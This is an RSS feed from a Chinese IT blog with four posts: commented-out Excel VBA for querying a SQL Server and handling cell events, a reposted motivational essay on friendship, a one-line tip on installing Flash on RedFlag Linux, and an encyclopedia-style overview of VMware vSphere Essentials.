﻿<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>IT博客-青蛙學堂-随笔分类-系统</title><link>http://www.cnitblog.com/yide/category/1519.html</link><description /><language>zh-cn</language><lastBuildDate>Mon, 25 May 2020 02:33:08 GMT</lastBuildDate><pubDate>Mon, 25 May 2020 02:33:08 GMT</pubDate><ttl>60</ttl><item><title>Excel VBA 连接数据库操作excel</title><link>http://www.cnitblog.com/yide/archive/2020/05/25/92205.html</link><dc:creator>青蛙學堂</dc:creator><author>青蛙學堂</author><pubDate>Mon, 25 May 2020 01:42:00 GMT</pubDate><guid>http://www.cnitblog.com/yide/archive/2020/05/25/92205.html</guid><wfw:comment>http://www.cnitblog.com/yide/comments/92205.html</wfw:comment><comments>http://www.cnitblog.com/yide/archive/2020/05/25/92205.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yide/comments/commentRss/92205.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yide/services/trackbacks/92205.html</trackback:ping><description><![CDATA[<div><div>Excel VBA 连接数据库操作excel</div></div><div></div><div>1.连接数据库，查询数据</div><div></div><div>Private Sub CommandButton1_Click()</div><div></div><div>'</div><div>'Dim conn As ADODB.Connection</div><div>'Set conn = New ADODB.Connection</div><div>'</div><div>'&nbsp; &nbsp; Dim rs As ADODB.Recordset</div><div>'</div><div>'&nbsp; &nbsp; Set rs = New ADODB.Recordset</div><div>&nbsp;</div><div>'conn.ConnectionString = "Provider=SQLOLEDB;Server=192.168.*.*;Database=testdb;Uid=sa;Pwd=*****"</div><div>'conn.Open</div><div></div><div>'MsgBox ("连接成功！" &amp; vbCrLf &amp; "数据库状态：" &amp; conn.State &amp; vbCrLf &amp; "数据库版本：" &amp; conn.Version)</div><div>' MsgBox ("连接成功！" &amp; conn.State)</div><div></div><div>'&nbsp; rs.Open "select id,name from table ", conn</div><div>'</div><div>'指定页面单元格赋值</div><div>' Sheet3.Range("A1:B1").Value = Array("id77777", "caption88888")</div><div>'</div><div>'设置表头</div><div>'&nbsp; &nbsp; Range("A1:B1").Value = Array("id", "name")</div><div>''将数据输出到工作表</div><div>'&nbsp; &nbsp; Range("A2").CopyFromRecordset rs</div><div>''关闭连接</div><div>'&nbsp; &nbsp; rs.Close: Set rs = Nothing</div><div>'&nbsp; &nbsp; conn.Close: Set conn = Nothing</div><div></div><div></div><div>End Sub</div><div></div><div>2.单元格取值赋值</div><div>Private Sub CommandButton2_Click()</div><div>'指定页面单元格取值</div><div>'&nbsp; &nbsp;MsgBox Sheet3.Range("A3").Value</div><div>'指定页面单元格赋值</div><div>' Sheet3.Range("A1:B1").Value = 43434343</div><div>End Sub</div><div></div><div>******************************************************</div><div></div><div>3.单元格选中单击事件，获取指定行指定列</div><div>Private Sub Worksheet_SelectionChange(ByVal Target As Range)</div><div></div><div></div><div>'MsgBox "777888999"</div><div></div><div>获取指定行指定列</div><div>'If Target.Column = 3 And Target.Row = 5 Then</div><div></div><div>'If Target.Column = 3 Then</div><div></div><div>'&nbsp; MsgBox "你选中了:" &amp; Target.Text &amp; "行:" &amp; Target.Row</div><div>&nbsp;' End If</div><div></div><div></div><div>'End Sub</div><div></div><div>***************************************************8</div><div></div><div>' Private Sub Worksheet_SelectionChange(ByVal Target As Range)</div><div></div><div></div><div>'&nbsp; If Target.Column = 1 And Target.Row = 1 Then</div><div>'&nbsp; MsgBox "你选中了:" &amp; Target.Text</div><div>'&nbsp; End If</div><div>&nbsp;' If Target.Column = 3 And Target.Row = 5 Then</div><div>'&nbsp; MsgBox "你选中了:" &amp; Target.Text</div><div>&nbsp;' End If</div><div>&nbsp;' End Sub</div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><img src ="http://www.cnitblog.com/yide/aggbug/92205.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yide/" target="_blank">青蛙學堂</a> 2020-05-25 09:42 <a href="http://www.cnitblog.com/yide/archive/2020/05/25/92205.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>FW:结识正能量，跟对人 </title><link>http://www.cnitblog.com/yide/archive/2014/04/03/89393.html</link><dc:creator>青蛙學堂</dc:creator><author>青蛙學堂</author><pubDate>Thu, 03 Apr 2014 09:45:00 GMT</pubDate><guid>http://www.cnitblog.com/yide/archive/2014/04/03/89393.html</guid><wfw:comment>http://www.cnitblog.com/yide/comments/89393.html</wfw:comment><comments>http://www.cnitblog.com/yide/archive/2014/04/03/89393.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.cnitblog.com/yide/comments/commentRss/89393.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yide/services/trackbacks/89393.html</trackback:ping><description><![CDATA[<header class="entry-header">&nbsp; 
<h1 class="entry-title"><a href="http://www.xiaobapo.com/?p=8" rel="bookmark">结识正能量，跟对人</a> </h1><!-- .comments-link --></header><!-- .entry-header -->

<div class="entry-content">
<p>&#8220;沙子是废物，水泥也是废物，但他们混在一起是混凝土，就是精品；大米是精品，汽油也是精品，但他们混在一起就是废物。是精品还是废物不重要，跟谁混，很重要! ＂</p>
<p>&nbsp;朋友不是乱交的，每天在一起喝酒的不一定是真朋友，每天在一起混的也不一定是永远的朋友。人生要交的四位朋友：&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>
<p>&nbsp;<br />1、交一个欣赏你的朋友，即便在你穷困潦倒的时候反而会更安慰你、帮助你。&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>
<p>&nbsp;<br />2、交一个有正能量的朋友，在你情绪低落的时候陪伴你、鼓励你。&nbsp;&nbsp;&nbsp;</p>
<p>&nbsp;<br />3、交一个为你领路的朋友，自愿做你的垫脚石，带你走过泥泞、拨开迷雾。&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>
<p>&nbsp;<br />4、交一个肯指点你的朋友，时刻提醒你、监督你，让你时刻发现自己的不足。!财富不是永远的朋友，朋友却是永远的财富</p></div><img src ="http://www.cnitblog.com/yide/aggbug/89393.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yide/" target="_blank">青蛙學堂</a> 2014-04-03 17:45 <a href="http://www.cnitblog.com/yide/archive/2014/04/03/89393.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>RedFlag linux 安装flash插件</title><link>http://www.cnitblog.com/yide/archive/2012/05/02/79500.html</link><dc:creator>青蛙學堂</dc:creator><author>青蛙學堂</author><pubDate>Wed, 02 May 2012 05:26:00 GMT</pubDate><guid>http://www.cnitblog.com/yide/archive/2012/05/02/79500.html</guid><wfw:comment>http://www.cnitblog.com/yide/comments/79500.html</wfw:comment><comments>http://www.cnitblog.com/yide/archive/2012/05/02/79500.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yide/comments/commentRss/79500.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yide/services/trackbacks/79500.html</trackback:ping><description><![CDATA[下载 rpm安装包后，关闭浏览器，然后再装就好了.<img src ="http://www.cnitblog.com/yide/aggbug/79500.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yide/" target="_blank">青蛙學堂</a> 2012-05-02 13:26 <a href="http://www.cnitblog.com/yide/archive/2012/05/02/79500.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>vsPhere</title><link>http://www.cnitblog.com/yide/archive/2012/03/12/78050.html</link><dc:creator>青蛙學堂</dc:creator><author>青蛙學堂</author><pubDate>Mon, 12 Mar 2012 03:05:00 GMT</pubDate><guid>http://www.cnitblog.com/yide/archive/2012/03/12/78050.html</guid><wfw:comment>http://www.cnitblog.com/yide/comments/78050.html</wfw:comment><comments>http://www.cnitblog.com/yide/archive/2012/03/12/78050.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yide/comments/commentRss/78050.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yide/services/trackbacks/78050.html</trackback:ping><description><![CDATA[<h2><br /><span style="font-size: 12px">http://baike.baidu.com/view/2893834.htm</span><span style="font-size: 12px"><br /></span><br />概述</h2><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　</span><strong style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">概述：</strong><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">VMware&#174; vSphere&#174; Essentials 和 Essentials Plus 套</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　件专为工作负载不足 20 台服务器的 IT 环境而设计，只</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　需极少的投资即可通过经济高效的服务器整合和业务连</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　续性为小型企业提供企业级 IT 管理。结合使用 vSphere</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　Essentials Plus 与 vSphere Storage Appliance&nbsp;</span><a style="line-height: 24px; font-family: arial, 宋体, sans-serif; color: #136ec2; font-size: 14px" href="http://baike.baidu.com/view/37.htm" target="_blank">软件</a><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">，</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　无需共享存储硬件即可实现业务连续性。</span>
<div style="line-height: 30px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 30px; font-size: 14px"></div>
<h2><span style="margin: 10px 0px 0px; display: block; float: right; color: #3366cc; font-size: 12px; font-weight: normal" data-edit-id="2893834:2893834:2"  editable-title?=""></span><a style="color: rgb(19,110,194); text-decoration: underline" name="2"></a>主要优点</h2><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　&#183; 确保业务连续性和始终可用的 IT。</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　&#183; 简化 IT 环境。</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　&#183; 降低 IT 硬件和运营成本。</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　&#183; 提高服务级别和</span><a style="line-height: 24px; font-family: arial, 宋体, sans-serif; color: #136ec2; font-size: 14px" href="http://baike.baidu.com/view/330120.htm" target="_blank">应用程序</a><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">质量。</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　&#183; 增强安全性和数据保护能力。</span>
<div style="line-height: 30px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 30px; font-size: 14px"></div>
<h2><span style="margin: 10px 0px 0px; display: block; float: right; color: #3366cc; font-size: 12px; font-weight: normal" data-edit-id="2893834:2893834:3"  editable-title?=""></span><a style="color: rgb(19,110,194); text-decoration: underline" name="3"></a>什么是 VMware vSphere ？</h2><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　VMware vSphere 是业界领先且最可靠的虚拟化平台。vSphere</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　将应用程序和</span><a style="line-height: 24px; font-family: arial, 宋体, sans-serif; color: #136ec2; font-size: 14px" href="http://baike.baidu.com/view/880.htm" target="_blank">操作系统</a><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">从底层硬件分离出来，从而简化了 IT</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　操作。您现有的应用程序可以看到专有资源，而您的服务器则</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　可以作为资源池进行管理。因此，您的业务将在简化但恢复能</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　力极强的 IT 环境中运行。</span>
<div style="line-height: 30px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 30px; font-size: 14px"></div>
<h2><span style="margin: 10px 0px 0px; display: block; float: right; color: #3366cc; font-size: 12px; font-weight: normal" data-edit-id="2893834:2893834:4"  editable-title?=""></span><a style="color: rgb(19,110,194); text-decoration: underline" name="4"></a>vSphere Essentials和 Essentials Plus ？</h2><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　vSphere Essentials 和 Essentials Plus 专门为刚开始体验虚拟化的</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　小型组织而设计。两个版本都提供最多三台服务器主机的虚拟</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　化和集中化管理。vSphere Essentials 可以整合服务器以帮助您</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　充分利用硬件。Essentials Plus 添加了 vSphere Data Recovery 等</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　功能，可以实现数据和</span><a style="line-height: 24px; font-family: arial, 宋体, sans-serif; color: #136ec2; font-size: 14px" href="http://baike.baidu.com/view/1132.htm" target="_blank">虚拟机</a><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">的无代理</span><a style="line-height: 24px; font-family: arial, 宋体, sans-serif; color: #136ec2; font-size: 14px" href="http://baike.baidu.com/view/235162.htm" target="_blank">备份</a><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">。它还包括业务连</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　续性功能，如 vSphere High Availability（用于在检测到服务器</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　故障时自动重启应用程序）和 vSphere vMotion（可完全消除用</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　于服务器维护的计划内停机）。由此可以建立一个始终可用的</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　IT 环境，此环境更经济高效、恢复能力更强，并且能更好地响</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　应业务需求。要获得具有更高级功能的可扩展解决方案，请升</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　级到 vSphere Acceleration Kit。</span>
<div style="line-height: 30px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 30px; font-size: 14px"></div>
<h2><span style="margin: 10px 0px 0px; display: block; float: right; color: #3366cc; font-size: 12px; font-weight: normal" data-edit-id="2893834:2893834:5"  editable-title?=""></span><a style="color: rgb(19,110,194); text-decoration: underline" name="5"></a>无需共享存储硬件</h2><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　推出 vSphere Storage Appliance ：vSphere Essentials Plus 中的</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　高级特性需要共享存储功能。过去，这意味着您的环境中需要</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　有共享存储硬件，但是现在不必了。现在您可以将服务器变为</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　共享存储。vSphere Storage Appliance 这款革命性软件让您免</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　去了共享存储硬件的成本和复杂性，却能拥有共享存储的功能。</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　只需点击几下鼠标即可完成安装，而使用 vCenter Server 即可</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　对其进行管理 &#8211; 非常适合所有中小型企业。保持 IT 操作的简</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　单性，同时使用 vSphere 的高可用性和自动化功能。</span>
<div style="line-height: 30px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 30px; font-size: 14px"></div>
<h2><span style="margin: 10px 0px 0px; display: block; float: right; color: #3366cc; font-size: 12px; font-weight: normal" data-edit-id="2893834:2893834:6"  editable-title?=""></span><a style="color: rgb(19,110,194); text-decoration: underline" name="6"></a>vSphere Essentials Essentials Plus 用途</h2><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　&#183; 消除停机并保护数据 &#8212; 利用虚拟机实时迁移和虚拟机集群</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　中的应用程序高可用性实现始终可用的 IT。</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　&#183; 整合并优化 IT 投资 &#8212; 实现 10:1 或更高的整合率，将硬件利</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　用率从 5% - 15% 提高到 80% 甚至更高，而无需牺牲应用程序</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　性能。</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　&#183; 最大程度提高应用程序可用性并保护信息资产 &#8212; 通过 vSphere</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　坚实的可靠性以及集成的备份、恢复和故障切换功能，确保</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　始终可用的 IT 运营连续性。</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　&#183; 简化管理和提高工作效率 &#8212; 在数分钟（而不是数日或数周）</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　内部署新的应用程序，监控虚拟机性能，并实现修补程序和</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　更新管理的自动化。</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　&#183; 优化软件开发过程 &#8212; 允许测试和开发团队在共享服务器、网</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　络和存储基础架构的同时，在安全、隔离的沙箱环境中安全</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　地测试复杂的多层配置。</span>
<div style="line-height: 30px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 30px; font-size: 14px"></div>
<h2><span style="margin: 10px 0px 0px; display: block; float: right; color: #3366cc; font-size: 12px; font-weight: normal" data-edit-id="2893834:2893834:7"  editable-title?=""></span><a style="color: rgb(19,110,194); text-decoration: underline" name="7"></a>主要功能和组件</h2><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　VMware vSphere Essentials 和 Essentials Plus 包括以下主要功</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　能和组件 ：</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　&#183; VMware ESXi 虚拟化管理程序体系结构提供强健的、经过生</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　产验证的高性能虚拟化层，允许多个虚拟机共享硬件资源，</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　性能可以达到甚至在某些情况下超过本机吞吐量。</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　&#183; VMware vCenter Server for Essentials 通过内置的物理机到虚</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　拟机 (P2V) 转换和使用虚拟机模板进行快速部署，可为所有</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　虚拟机和 vSphere 主机提供集中化管理和性能监控。</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　&#183; vSphere 虚拟对称多处理 (SMP) 使您能使用拥有多达 4 个虚</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　拟 CPU 的超强虚拟机。</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　&#183; vSphere vStorage Virtual Machine File System (VMFS) 允许</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　虚拟机访问共享存储设备（光纤通道、iSCSI 等），而且是其</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　他 vSphere 组件（如 Storage vMotion）的关键促成技术。</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　&#183; vSphere vStorage Thin Provisioning 提供共享存储容量的动</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　态分配，允许 IT 部门实施分层存储战略，同时将存储开支削</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　减多达 50%。</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　&#183; vSphere vStorage API 可提供与受支持的第三方数据保护的</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　集成。</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　&#183; vCenter Update Manager 可自动跟踪、修补和更新 vSphere</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　主机以及 VMware 虚拟机中运行的应用程序和操作系统。</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　&#183; vCenter Converter 允许 IT&nbsp;</span><a style="line-height: 24px; font-family: arial, 宋体, sans-serif; color: #136ec2; font-size: 14px" href="http://baike.baidu.com/view/315045.htm" target="_blank">管理员</a><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">将物理服务器和第三方虚拟</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　机快速转换为 VMware 虚拟机。</span>
